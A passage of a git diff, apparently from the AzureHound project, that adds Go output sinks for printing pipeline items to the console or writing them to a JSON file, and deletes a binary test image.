+!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix diff --git a/sinks/console.go b/sinks/console.go new file mode 100644 index 0000000..68ec77a --- /dev/null +++ b/sinks/console.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package sinks + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +func WriteToConsole[T any](ctx context.Context, stream <-chan T) { + for item := range pipeline.OrDone(ctx.Done(), stream) { + fmt.Println(item) + } +} diff --git a/sinks/file.go b/sinks/file.go new file mode 100644 index 0000000..922ac59 --- /dev/null +++ b/sinks/file.go @@ -0,0 +1,64 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package sinks + +import ( + "context" + "encoding/json" + "fmt" + "os" + + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +func WriteToFile[T any](ctx context.Context, filePath string, stream <-chan T) error { + + if file, err := os.OpenFile(filePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0666); err != nil { + return err + } else { + defer file.Close() + + if _, err := file.WriteString("{\n\t\"data\": [\n"); err != nil { + return err + } else { + meta := models.Meta{ + Type: "azure", + Version: 5, + Count: 0, + } + + format := "\t\t%v" + for item := range pipeline.OrDone(ctx.Done(), stream) { + if _, err := file.WriteString(fmt.Sprintf(format, item)); err != nil { + return err + } + meta.Count++ + format = ",\n\t\t%v" + } + + if bytes, err := json.Marshal(meta); err != nil { + return err + } else if _, err := file.WriteString(fmt.Sprintf("\n\t],\n\t\"meta\": %s\n}\n", string(bytes))); err != nil { + return err + } else { + return nil + } + } + } +} diff --git a/test/1.jpg b/test/1.jpg deleted file mode 100644 index 2c4093ec3ad24d65c6bdbdb5744e9a94ca4890ed..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 612508 zcmbT6V{j!*(C<%dI~&_JHnw@ZQHh;jcsQ)yZ3pk-nw-^-`~u9>8|dn zshSV-@9BRV|9%0`<)!7M0T2)X0K|U-@b52xRKm%@+10|$&BC0_)Q8O0*}{t1)xzw5 zjsFe+xKiFWmH>c~5`X~!0KosZ{^Q>^APfNge}RRCfrW*K`ww_zg#Q5<3mFypzlnu` zjgE$njX{EkgM&vxLHv!Ff`OWvfs2DnQqln8|HecA|0Vc01i*lY=7S4@f}j9EVn9G) zK>Qm4@BjdikWdi+bIAV%1{N9)@Sh1D0Rr$pj{nC61q}lU0f2@3w*^3kf&f6GL!ti{ z^nO2e!1oUzSOnbxW^837K)NvlqCk`1n#8|)TAQ09)VM>c#}6DAd0XlQ4AG4}hkWx& zmm}VeCoP_txjmCesdxFt>1aJ8og_;M*xC)fWr8wA9NZM-0#?c+E;RfZ#qnkm@LPg5 zK;X0ho(=G>G*EFisRSHA>~4LZ9k9P>f-dI(c3siL-LF4>1Mr?1APE;W8oBggmHw(Y zgKp;d)pQ1i;~~$-&az6&jHq7H)Xf@P3xhp(0TmqK$j^BwW$RNVwBrPR!eDXlaMLj9 zwN2Ej9~4I=j4+hQ2xqSil-GxbDKl^!4U@|(mNP+fEP%Cfl670XVq6gvt)J4fHNd*9 zb2))}uE!7r>bnuGre#w}T{`Aj9x&r3^Va=PV&!tscCq|3*j9_kdeVt*&7;J&>RW}i zk+}?2!!|VKGvNFs5rKr!GJ&3$rjuQUZiR27GLj~t%7%g(0S-Ce7TWL`b!y>)eU?fY zK%C;O_Qd#NO!C5W;tXVN1GB7rLP!&2_qskioF}_px7*7SJ!N%mrBL$Ly$VogGY-Tc zPiT^bx`2#yvBm;n=`DpfkJ1TO%@t8d(ssn3QqJ08YsvYgV10J{f%micuERl*L^)v9D>j5qek5CQdaiR>v!R|_I4sBB zxjsPRAmEHgwW-82glRw&l@BVd0oWsGL)^DuY>L#p@#kuRzkVX89ZG}uo zhT}wY;}rDE?Y!CUAZ_b=a=db)YdVSZP;8FTqKEmo^`j7k%p!rF>N6^h=bMJO)r%GD zm1CEJ0SCM$(J#&-@jT!%y>_enYVWFCkJQ% zUt_u$|J%0e1Ch<|cgR4;BwF+~bNla^$8LF3@KFUrhmS~Xo1 zkqdFVB+i|odRHTT24zb8K*EVN&fBuqx2zj8v+8(3c2#P|$i*Q!tXq`^JTlex1ufKB zgo>=L*-~(v2~>)m1$zm$$|HhwHN!k-#pEEv{v6(<7697}e}a-ppor z1P~d)_?4t*wc844r^|z1bR{qEC@25%X%qk>MA$mi9eX`3OhmcLdo# z!ukLbM}%uZ@)kxuV_JwCe9lBU2FiZK)7bb!t$Ev%5Jl>?s=HQ&QJ_2$r>B9|lbpm6 zIYCYBoP?eBw%+fI?aZ^zJIvTQ=@B!rGuo1>4H}GD)79|-*61_}JJn@XkTLz#LfVI6 zeZr_>HY~#&H4Lz6twJgXzKr-8BbKgc&$}J69B0$DwJGIVD5l0*J6b-pV{8iyJ*D%) zi9oRG-4T()i>YjfQPZ|vzjTQt6p0I_XwvjbCRwOm&UG%xt~P3BChl>pDCZ4pY_VNh zsLXu2tGm`y-kFJZkqsNG{+aOi?MXS%P3jXij5vWH@BOcGxM@w%c`QTYFTP1GprDkc zuJ@g!xX*DBqxrfyPNFP*lVGtZa~Fj#R$}bs_Vnk>V*2OUQSOz_!r6PO>K$44Lf=(x zK*&t_){*48R_%`E0APocIkwLM)@eG*bC>pkcvy7Q_J&rNjF(Y8cO;32D3?XOeOrjrS=*5zrl`)gM=73%xMEy$xh;-k8Z=Xkf;d!Te)CGTOT)3; zh>fIeK=@aaIAWiJonS-YA3%5xk7hA**|}cM z|AR2WB^N1gW-{+qA{VajX=mP}4VwnKOxC^X+UF5Z4H>1~E^m89$etr>tXC#IY5rspxfhF2 zerUw)bObvD!VI^6fF)GEdT&r>1|OXwCb4U+5T~B3uxGApg|W7;$rb7!Cl* zR*O~`+n|kx)w9%ZcSM{meO$z4W z`yGg?Up0x6ZQ87p_b^B!Up!Q{8OgwTzM*+IRK158wL0lcs}eLaopi!pgut`buv9*( zWe}iMX}Hwd!tmnPjd+t^r0vRk`diH%j5k82IXUrgh5KUJE{owiRr@Xn7vQ3alf(1w z$iEWJ&v`^HVYm5~)cfRlwF#d7mFa?4-c|P)E7rbwTBT)z`a5+UF;&W5>ZwQK}`)i?mDWbm;Mp9;7TTn(~HNVv&*u|>DyulS& z`D`!MAf8Hs21cCf2aqnrg;?v5O<&U=!@2R_r6^mQpH2*E;K98tGKFeQ*5}6<#M~c2 zfZENKEqjwv*y=bsI}Y9V=>UH`Rzd=}>J_;=dFJ31sdecvizQ11fVav7t z`RL2)x(fPxUI#7?@u$~%7#aEpka+z}(Q+bjP~beH56gU|B~%`tg3GfzlDLX0@NX_t zc9}`;&+W7SBCHX2N?0?vGT@ObHH>E}Y-VQf*`&JCE>%+Q*~|~98W(%C6XfGgHlShU z+%cJX+F9?p8Rr}$x!m>7d?}Ld9987uoJmSPio2*JS8ixCKmP|1U2oRVU}_qaI&r0J z<8-`u8^ZpXQ`eo`kyR>zyTO?FoyO?pIf_n4(XhX0W@ha~s%>y0^ksBQ!Zb-t)A#Ji%4Ed9Bb9-3x-lA`ehJ5M zaA2<#7HzM5HNau6>a3lsk&}!l!H??Vl!C~@Rc*CQ(r%(MbIIV0v9fno1Y!G@{}Q2E zEH_{%HkJJO`#jsK?(y;X(a~XY9W5kYuhlKkwYi7_0ORK%|@9~Qa~E6 z7K!Q2``4NYz3qE%@PIuuccU%pg?_|IT%Nud2DtCeb5O~TB}e2V&ZRCeQ)%gJXcBsc z#u;MHmwCoV4hjYhE=0BUWl$mrTpPDR0PPmkjynGS1IWBII_>A(MkT9vZ{Rp!itNg9 ztb8cx*=&c{!(n&Y^3MWs;vIV`;gDGwCv9F%X=-8$XE!w=<6g8kh}@X+?e;UBulx7 zD0S2fzvkQL*ZE%4o^EXSlLP!)yQ;g=g@x^MGcwLFF`*g8wKrZf}R#bvx@=1zBXG|iYAU9 z<@8JokcBme~q9h z)7N!rqVmh6$^xBBt+vxF^>^fr8wT0XVr>U#7FDoTp3TRlqz2@hLC>#0GmdA0_bT_| zrTj32NCI}@9lUcXaR*g&Af^$UrmH?FU87Nq zKhWaNZ5>SPi$n~Dd?O6*=v5z5wbEF2pjI<}8&>7 z330AD)bJ7*Op;^N$rf7kd}ZuY_)3x8l(>OBaSK|x9l3?tq6#sk;`%(XX{f_GY<2CO zV!eisDap9g6cu|J3>CGCo_6a{^$ZjGdNWhtCV%94rpv)-A1WbZ`ZvGd>g~UkuE%j8 zi-w0NX`D9}G>B}U81A%*%S98Z=ZRjl;6e!<_sxiaQCb-Mwo~L|aefj*ZJ6VFPiG6H zR4PBqKPS9!ShQ{50<0AT@N(MZgCflu=TcP^u>M!@J$m!(G}!$Q$rtA#bX ztsP-1TrJUi+kYa@+vnEdRUbFqT%3Moo+9&#d@nJYMQs*{s9s}ZS3=>aU>ml0)>u+5 z&a@CU(pSa58>oFLwTA}Or=g2=Uaa3AL;WFSI&LMXV;qTa56rB7qu_|Lgnwh$o;-jl z$d2Pn`-xTWtB86bspGLtN2uCdjg?J4Xr_GPGBdIKD&{ZzFh#|eX#}umK1@1~6cqKRq^^FySGE;9#m-1O%nqMA@ zZEaNM2-a-}Cv50o@tS=zVSj^k5qHF9<>eybQ zoU)PyjgtR1-Tx4rQ<{XzSd(n-Yvaol;ep-#7~Q^L_#$lKn0_wtBNml@aWLrT+Md1~ zg*Q=DB)VI#^K919dy?Cq>vDRId@7axy)oIWfo_@(IYU!t&nfH1U zslf0EK@4|iKhPb#{A*Q4s;o4F0lId#=qi^&^w3*GzIAO=yRm$KSvFnW)^J^}0X}({ z0QG3z%v>g)T%Tl-L35J5Sy9iVYb^RnjwLoMzu^zaSd=n5riW7H!B&%J_;m>RCG2m& zCHrS98jPO=`7^KbP%0Xd=o{OMkeia19OmUIUyLFuE%&fBHB4$?HKzU}K#OgneFF+0 zk5VJ`7AMmaR-`f@OK&n;-ESO9Vpqr}<>YB+${W6}D9s+1m=h1LiK zs>buu@6@tomffL&{e)TtW=(kJK9$z>)hlGCVxoxP)(%+|lPvptg9Xno(KP0^yfx~0 zwLqtrSrGTZI7jV@fZHKeYcWSHCj0eN;~+ZLQ(3mKPI$2f2RWq)ar%rOfNt$2ooFT9 znw6u<$X?^;c}?CxsbU!OBDOG|ZmOUgGfOi*wk$LE+ioY1=%yc%8b%8FpU1Srl75d? zoTLf$!zXndEiF?4o%#hLhNYs^^t|@|gDhNKIEb=pB?#0YSjr391gih!A^*0(k~z zFPR5iEp-Y!JJrBBUin%8mmN)OAGtDuW^+}8A0k#ds8Hi%xfGxN%@%hR6X$*M@AhpU4qj|c?45X$TBW1b`?VWH&q0Y~ zwn~hzoE7S3Kt`=wfeUKbS9iQ^wHR=Tvc)T3<~bRwC9q04_eLZy+va{L_u%vGXe;9Wi z(IiEPrGPf*cqxA+?SgJ8G4!!%R|4BBU7L;6z8;WB>#pmqGdRJ9n@5`Gy$hnyT?3M8 zQ@77CWU2lNMCf&g_UInXbY9$KAyNLF#{_Cl%2hH4I`ZTu>m^|%UaeZ+%Om)=rG3G6 z)PYwzgylZSbBo7V=&$mu@~$id2!iN?ixs2vj6BZPca6>KXJaHqKe8*{ONL5f{CB_; z=-D9_hCKfj9;Y!a>cDu$>pon%YElkiE+q8KHoZZdtheT$Umo$>-$wh*= zHbrrQJ#l%uB;zzmr+!u|dj25%;8N!Fjg*(Vdis?)xn9nVFWHElvVGlN5pM4r(^{fs zKo)Vz;`X=?f|%G1_7x#qyYSnQO`=B>F!WlZEBk3w&&TG{;!3cnAzoO;fgtx2nxup# z=o*rE^>hGtB5P*4Fg+83;Am)1rdXJiM!r|e_qew9E;ptv+GUmI+h=^d1|5#wSXR$B z-+p5@utXY8z4#_qvpZ>hMp#XV5Wh3>uBvxs)Lm*%+M9=TZSnnDQ;uJ}XFq+w@BJgQ zHOyRlEl%OH%v2k{vp&DgytCegjE^$tAh-d)ZcAgGarRq~>B{>`yLfh@YFTPLx{n;q zC6ao+2C!cgUGpP9M%hZ=_>;6O`Gg<@&UQvXWeCca0ksFhNpa;|J2uW_IL_jcB(f_ zOv%W_T$O%zylZiti>~`F^6F1=Uw+Aq6nl!Oh;KY3uK<^g1%uj@}}kTr?sgBeT54` zEM%Ng{XVNPYP@RmNJU=+n@=jMnMXOe?$&3HDyMP`Ly!$9V-G-V-x9?Trl3$KPMkeU zp5mNdD_d(@QiNopXQe%Sj&^zpHXJF*>Z$s$e*!;wc0-)?^fQQq6Bix8l=vF9la)HD zz59Dks&k-h=Nyak-j^Z8#W=|%TzLpugH~H49|&lsbA&lJD~+4;#C@6P8V}B|zy_2~ zdQw1o$0LDdG+SpoA@e7-?iYiuKaxBS_>4IXV$jo0Blp&(-CF-jOY@arZ8B0bDTkB8?R9&6!G`BawntI8Wo@x~MQ>LA(HG;JkJu ziMWVv-_0G!F_|`ix!f?RHhC)%UrGLQu$36$h`>{ z>^;9w7wN24bS=z@Ap3hs|Bpys?FdiZT6qaaQO_nL3jdsel$&!02j-=HWsuwW=ht$t zEQn~7_NbAGodHe37O7b`sfO@fDrkhLS#$mErQ(x_zuiSyJQvmvr}!q%Z^?+!M_lo7 zCqa_eTf@YCS${1dLiKMM=qvfRPvdoKl@9n&&c|XcZRo0^3YYMAnyj1HvE;F7hqp`P zr4!w_>oFRKrbwFRJ%k{hWgYKDoV2o+f=k|fMVl|+5P67gnNPs!Cs+Ncpt`lITS$hV z@y8bS`xn(ZicC!8ENh;cmdnWDUJ1i(-B0-@n!Fx!3j&3jSiS4gwhl;9P6nS`w5Bkn z85Q;1sy=!eP5d4065Vt7|5R)te)jYI=L9&@L= z6RPM?(hiEDo901i7EuNY-i9)IqbB`zgwQ&pNYd-}MN(`j?=QnLJ00e+y1}NfTki93 zH)>qt;1us(t%6uLfO-m^Mi>%U@Wt@y=QsNNl{Xs!dgvaF>kr8u(B1f2U59M_uu!cK9&=}GZk%v;QBr$T9){mms&}OIPa@%B&ahoxK9g?F{gP&c1 z81a=r;OiH?ZM_NOvw`l!v$%!oQkg0EH#c{tJqMDW#{tWIX`!LexB2oQUdW)t(0);M zzO&O5Y;^o0S$j~x0>29yo;W`q(p&@Jc8rW6C0YaqOSp^{+gja6GKEWmEf(XHzTbcR zR$n0!v($g59mX`{(Z5cp0%&5?dFkVNJf&b&cR1I}k6S##OoJKMrc5{DFTQ`u=K{wfyc z=h`BBs0$!*P1OCR{Avd|NjAZPa@qE9rMR0ahXv(En>nk;0r{9nzO{;(n`vCKu|e#3 z9yaiL&9Km9kL-N5*9#h1KV8fc8aKzzyzR)eM@VaK^N_8_7L2Z@^Q?zhcj6%hi z6dml8C)z3-7c~0^nGTIZpbOs)>SEbsZ-v+RfD=4F>_Rj9rJ@VZqR+3RGb=m$Q+!wq zN>sIFTiy4#eBLKb8x!if0Q)37CB7`qET5iwf%Fs<&}yi>6wW}sG{GYK>HH$Y>4mc@ z*G(TMBzw$}d|I6m+=Y!8Qy5NIH-=$;g=VrboM-R4qQY@gA&WqCi@2uBiEw^lbF!I~ zxDN3Ia)ngc=mqIG-&IfL?m&1vcFF_AchtsZTdCp2 za@_<^XIJM^0R+$;L?59CcWeEj&tEWoU60w`!HEKCC>|Ghihg~0@y$&~+l_w%GfZDB z#xe@^7@x|h*cl8?sj(2^P*@B2aXJ`Mig~H@gw^YjKf_k-_#HxoDq8QtrM5q{R|!V% z(+hUUR4|L>dsD@o47L@9L1;|mh}R6)q0jmNf?AVEdsHPO|F>xkOp3YBpAGA~r^jUe zd}t95lLBLMd_7ZjDdXC}2hNS1<*aED&zf}+UpZb3uAO2! z#=6S|_aE2w`JxR9Jt>`)I$F=n-E=>lpTPjvEIUuh;P&}_0qy$6K}oi1NG}$mIj=`G zLK1DtsFh5EZmN4?_Z*>?-nV(5axz>C7ecyj$R4ikh~kvsN`L6ynlcZ4frch|Q&BTI z2WgZI{yI%OjO$w;I=P_hm3e>OUW^voboif~-?J|0e*;xF|NPZIs`wpP(0LcY)b$Y2 zF_lQR8F^p9Jf-Yz%eEQ`c>2a0{oQ0#H51FxcX|y@JII+hTM&nl@MV0iw644AT(Z|! zK}?J#s>!-#qQU~0-N5RUE}|?{jeR>pLRR~`^jRFrox{RA%tUsATB9wOgzDFQ7;#ol z!3)AT$x1yTi+}A#N>pCN-O5|XNlzMA2KJA*gHrie_H1eI_$CuS(le~%>*G;ucGOBg z=MRenP18D92EwaGIc+AeUuUPr%7yU&) z;eA0fbuzE($=#w;!w;h}$ZS1j!V)1NefxVUhvg!b^LepxWHq|yl%2at(!Ex11(~=G z?xID_SAxFC1~oWX=XIm;9%6-NLz*6XK0mUlEfqPi?L7pl&Z3jF3{#wcux1hd0*io! zF6*BBQhlytJTxswx50&WZCx%mDD4Gi<(BTuX%aDlkesrpY8qs1Cs2xQ6K&hbE~{Bs zZ`9VVMQY$XcPe~9-^4RvkG=lLtJ}vGq`Q|nPAQ?do8c}ktHC{|Y3W}H@-#?5 ze!5+_{`N0|zw&=rS$7XvOdqzP^5f@9$L_jIZs;x-@!-);dk7=U*2H&tF26rGDp zsg(P}J?0nD%${1C&fxQ`=k}3)t|8&{MDBL6pX<2~(?)&UXHb)~`< zQPxb?^`x_;;SvK)?25}f6EV7kd0okHQ)SOxzqx8gwqkORecLo#?OIIiT8@4b6FQ!m zG5viyN+vXVZ1@*J)2tS4Nj)4Hs9Jm;h_GhQY-s07;MKHOYOTuC?@%@y!-V9ly$gXk zQHNhzX+o2r+|Z?rdB-hvBBLlF-6}}`20IPQYa>vM_Qchb4WA<806kgs4&!%-Ac_N)i zm51w2TbpjZT=U*Yj;HG626ek3BMH@j`Ig5kEW$5lsAUdwUuG!Xt-T9}3&$OTT zELpgFkYI0mw#zTZrP_SeS#Wb!ZvW2e)GQ=Xoq^ARn5MrCQC?|zZt-u=piQyAX2)0h z?BBqwCBC)YiHkRGt-M?(cEljzDWo?GY9G-Y%*r0?zqhwx?Z(rg;)W}d`Nf}Q1&=Lu z!5xj^lnq^8>(tpZdpNk#lCS-FA1hDi4nM?9eJd9!Fx1>?xHL-S2bbde%7Q2M^@wdj z-Fkmp0@)k=^Vgbf?A$5LKUlBaB%B^Cye{*zI~7UfV$X7ztL#elvuN^+_^V{n-C2t1 zjpi%3X=vz3n~X3RcfDEFvi(UoxeMXV=Sb% zUZ3kTX0mNq?(Sl0(iykrwENx+6;#vF>x3>maKJIJf6ii`<3iH*j-C(~XM&J}$tv&} z)z9*L$jUtJ$uO5uJMHtXJu;Sr2`Vxq)RIUh)%X7DAi;}^&b*c{`H1A_eKXf!up4ef z1VWT03LQR3w>YmA`M(=(T)yjB7oEl{t))a3(__=sF)ONyKJEUfPLQh)$w7Bg7BJpg zEd(+!>biKG*fgYU@pWjO^FRVCMsi^l?D3X-e1(xB@?wcLfKBQ`H{Rm z7D!Kz^8hWMe`K-N3^#UOQ^PJNtLiLWZ8@d^vh~Kz?f^MWEajw02N))j=+!k`s%d(c8hOJ$rR%pdAtQf^qJiqs`joYG zsxTm}zmk}~P^0AXE=i9@SaRU;u-QI20M^Dt-UU#C0~g5LN(i+X>Q+uCIBo6<`=*W- zbpzd>>!zq(Eog=u0a%^M6fXnrOWYOL2H)OBiD@*C1IFCAc;d*SZbY7W=ZVOsvy4uP z5&VcEq>sN|kHZS-WZvg_4^RN-(MvCY%X0!;nZ1#OX`i#uWfFOv|)XACKaWzNJAC27H+oMB=jQhADrj8bhhBi-|@h} z>m-1)JicCw@Pk(yqW!W--EVo|9ppKy=Kc{S?|y~tRQws)a?bG z22G`k`7fAp{h2gT2%=#`FrNX{_z^8n)BDIrjNYOO*{t{^(H}-0feV}#ny1Ye;^A7k zz3+4iF}|``#E4>XCZvvQZ}^oK`f?lMov%PWys;~hc~9$cn0#sz;_6R{H2jQghEfc> zaq)Atj)zovSOFjO6ti88exG#}-b5N2YEWpgvkHU?U#^oiaV!WQUx>BhWP4UVIicdP2Tv>P zhfU?H{r55{tST1oW=j)>D(4UPgcwLe2Zf@{79kUUEBAiu%PI7r3=&6xDpOOhcvWFY z+p;j36cLEE)|mZd(EOfr6##*mV{(9@Q82~1)2ZWe4{fqU5px2T>*+m_0K*PRYM%JS{WR6(j(XN+OyN=kg zrO1|Mp<=OE#pTm-8yfvGcc)HPH`UtYYcIENPb&-R0dl#D^HpxD52T_hgKhdV6CzF% z){Rc`m3F`_8`MM${cS#LzjMTXtE5)`Nb>KuElh}n#`%7E$6cdzFoNbou8g@xH+L&X6T}nr8bIzAOOrk6$xNr-|3es^dYAzVzMB$p=DFtnf_`fpl6-kpiY$t#n6lBg1`MEP9#yeG{UXe!L6u zS%#U-clR+*r0YApnqQK3X{I!0m;uEm;H=ZnwRMx6u0j@7hwbxRrf zQf=!M8q343=HvS;Rzjbp?bj-@q;aFIpDx043Oc{`--y%F>#ivS&)daLHAw%yoXk&n zPn5u8t`IJOwVc4oqS8WrrglI*&D1S(kK49tBy)7OXd<4D7A{ZMnEWKdw>$9P@LTn4 zw(kLmKYH-{9W-X;D+-iOn_Kw0keyt^HS8qE;4+y)Emvj248*?8%v>l4X;VisEk*d1 z3(fm4T*RU;?Fn=IWY6rjhG-$;AGu4bwfMWApMpr{=3{WN zvDVYJI>{St@f`ebg^G1UbA+7~OmJ*dR1k=!h6RGhE+Km=y3@>;xh$5I5&RT~CY&i6 zXl+R4USWfH%UpC>AvhUo?yCRpX-5`v_=K~qrl4wB+gZ=Lq;>RYr0daMY{=1jjrh*V0kwT zD!_llP3~*e=8wv=k<|wLYy{Bl>2KEqQpG1H8s=N#Zk3(xv;VF{lYxpD{D z^)#*b#2Yy?{WS_Q)TATA9JEaignI@^7dYD9b2&3CJUIvHa3Tx3Tw+7|f?MVRvV=ac zJO5%;(Hii1xt4*-JaE)$J-{fI0b*Y{dTR~rT>MI^aCAcEWetOpl=G2Zsm5EFVBbVjvEBs&?6whQTyqSQ2 zMl%bk_BksMvja?KK!4WyoLcBF@8QMQB9N$d!nWG1dg6Ep*!f61rjRc;%|x_5v%<$Q z#D_QoWw;7<~sMKs@K<~`7vke--M)zSf zxCY;wKFF{M)L_^uJp-31W-1J?_LVUx$Eo_mK z6EFTQ&DD~s(+(!3Q&8_0r>VmAG3G3MJLO^)veR1eRHcq?E75MHUN*ml8FX<42AMW` zpkO*x_#t|cfS>>fd)K)gZxfOnarb$-{V;!ylkp`x*Uml_CoKZfUH`g#36J)*)Nb|W zs7z)5xcm{Pg_+g(t6r~<-tM+2`0*$tTg3MnCPnRSbE9r*9E)_p>x76Mm7m+9j=g^H zLxs@b3j55D?0?&oMw_v1eRv+Ui}z~?_emyU@=-6$Q2rN}cTe2nuHqT1)vcFiGM zhZU3Fi=eMifMVi4`|S8HVPdGjDtlX&oQizA2b=OFyu6eW97hL>aKl`UIjcZiC_SJ|mF@hZ%RIdIaB<0TR3^suITvT)JiPp@-IxTJ_EspbBJ&a`&*S`S=cGE;wKBhk`hF%yUC324JFcL& z+pb+Y(sC#kaD>$bU3$uYG#nJRbbkNM@h%@6UMs&fR&Anmypgr*@~j+~My)SU(t{EB z^ORo%cq^^lt7A^AaIph1b?Z*wtq^cfk- z2A-*Gse29Q1Bxqau8)Y!4N^ZRuRvIU%@uei;}4Za2uc27y4xWxh}{URqvdIqtm_Sq z$ud9vD_R2{U!saQN}L%uwznIk;$OdmNwYr3&-4u|r++3>u`&R;4M*mWXwTN*qmLXX zntyGujj*CrrhjubGyH};i0ty1hKw`BZd$-zr(F9SmsH05g5=H=^$);{+3YFXaQ%ZS zX;=S%pN&wcL1%ANJ z(ZAAhuv-5i$~{zCRAdE?J--Sdqa3OlMPmugatl{7tV=T+EpbS1*h*Q;$)X-nk#Ha! zocOL5{@}@S8v1~H?uOfZ&wD%k=l0XO9n*BQE|@50O4(#OPyJ5!8%&fRoYE8>6q~V1 zDhnNyQ2_+Oai4lzrI#fSTEu6PO^OWkr(hq1csU{94}Y(#YE?bWFHpM&obO05Vp4BK zUZax=+xSyIvy8&w(Q`Za#YFoI@`2ECb+U3c#%zsU1#Rc)dnKbD{!rIyh#V1dw(aK6 zq8F3{0Y2g$6`!>FcpueGG=;1-OLPr<#sqt{=BhI6XMxL6AU>>;I09InsI2=k-Jg^( zL_$nq@EU0a4L4}y{Zlfq~Ewy!3o<$O=uO=Mt|)%7Y~1@J*~B)U7R?dCh~u4 z&uY6j7s+}bV3w^-WyGsdW=*aZRDCLy2Qn4r%jr=MD`6_Osh=C?XkQ%^@ToHTQM7yZ zKA*TUEKt9o)Wo!#xnHzLZ3y6B&jg8^lx}Oc*?5XF+Ql4KQXsdD$n@fHCP9fPXxax3 zwo1#$>08;Gz7H(1TPp1{P0)2?O*K+wQZI|1K;O!0B$;e$tKH9t-c+S5P$lN|2e$p0 z{Itwx{W#Qk4sYS6oQgw{$LdPB69d@4ijx-qH)CwEdNKDuU=gm z;kU?X|8Q#_9g(6>Ak~GMOF2)NpDFFU<~_W0y-lIqYqypY(}+emVn;S+k8dn()5w8n zxp>MhX6aBPEr!jEpevHbwnOiHNmkc$QH7o)DbR$4{m-TELmo!Wz|3ju@=P5r(>asD z`8ih*6&&Pei1h2z=9XJpn!0EiY*(dzk^0L=M{J_s#ytFoFUpnFj@)dd7I&4vT_W8p zrBFiBPGQ|q$P*3cpnI5j(rUTxhKR^hh^>BLzU6c*rUsg}M)NXp7z@26<0B_mM_n3e zMrTiO!*Q37m4?b7O?M(ZJ>t*Gi7o7oJdgGy$)MmLu>zeVLS zKB;S`v2yE{NtCwx3^#x=6D)NGf zv71V_DR8)kAe5esYeTcIa!(zr!pu5jOgKVv`efO?2IBh-=^6U&!jH{X9QH{SUtcqA zb`pwwmYlyKNlHCGzlE+l+S(ALV=e+X4%f9YMSd22Ucm}5Hc+e+AO4oOu$;#?i{-jc z9cW#bOfT zAvn6949n;3)9d1K#kmTjxpgUMP$b%KKK}B*8(&|$kuqK__A?a8`v>sUv^v>Zzur&! z8-PRYh}oBTbs9}JxHxiv5gxv3fS$i{^V7J5=SrC}w!(jY?uMVQRxb^cJZM-d)V1Ll zvO3uhx)e9wv?$3rdGcFrmmam~S;`E)Bi;1pox7lX)3z#jjMiv<=vfjjxV?m(j9 zjGu17qG{Y%8H<5GHC&YA+K!4#m=*mlX;~MS)a7gBfd1&nHcpISH!R(zk8wp+uIeJ3S;RJ@ndqq2yGPsorkUUb?uh;!;xlS^I znvrc?XDFR95sicQbEz^K z2&;aex+RNRrsbq^51<5Zq)(iqyYOfG55E}w8DVI?uS)Uz5oT>0#eU|sz)@LY@R2)9 zRtjf#7L#UmM;V zN#hfGhLlCQu|yWGZP;reAwoD+4|~*}?thyM__8%j!1}w;xJBm8a*kEA z2oMJ_Z*tLb5Ga`E0?fkJooghsL-~`Hk(7NIlhd7XiqNR`YF2F2rs~RH$uF~bQQx9Z zWmI=-Ei}EATBaC64r!O!ky%%QqiiUgUKoo8zH?t{EXr@%=y)0x=e~&gPmKw=Yrj5|Z97a! z{as?msd+Clvwf9j(W?=RCcsv{P{kDn*siLy8(WZSSV8A%v!Onx18F4KGI*9SwSJ!& z)!KBo6UqgZP4WT*bQDW8Q?8y!pA_}h+qUD?{6=;#=d9*~^WP%SDg8%RL|2bX@g(Ku=`$>P9e1Cn*Pmhgdq^y?A=Eb2hJ}M@Z7eL8Wb8SI8_bp2pD0ot1B{W)cqzd zUNnHFp=yLV5ccD3NpDsD)i<{dFnJ|_uCG7*r7c>su~$f%;; zK3#Ivoee2o#;kPRpg<(}&=HL!JXF5cmPUAD4>-Qqrm0(2v$g0_=UUm7c*O@ZEd3My z$y`MnPJQ^AzA*}AMJ{{B0iarS>xx|Phde3y*3h}wwc+~gEChACu@SZdoLpOb0gPZX z0ruasV3_F)^tCEkA2X=pf~nIT-W%r}1bMkqY!RW22B$(CUc4Bu<65hT(i}2OEpJX+ zYu4wqu9p;r{dsUTPi8|iobC;wUxN0|tS>oJ>S1=hO7X2k=LES)jkOb67y{x$TCn2O6e2BIQ$wYRpxUbJn3j0R54@Di%>$jsjbrb3cq+8^M4^u+O;dU()}+K<`KPN z{=RTUWnN^p_tb`)2-U2Jy=Y&zIr z?+q#}r=(?vYc%`r=D#v)Gg^+{Kl6Gbyrq2w+V2T-`meUai!*#SZvhh$7P>ha&J5yL zug^vrKQMD*RI_2K>=hK+<-E$D^OSEZPP41@@tP8tohhV-ARf+hk;tzwnwT~}&M4U_ z$AozZrPZ2t#ICjVmffVPa@^=l3zxbCtGu=;94lY|wj<7m^X#5B^}nw~U=hdD`LAcL z*49T2^jE0DM+PyMimGZ`9>NTRtuUrCf%4?->T*gL+9+Yg)B3( 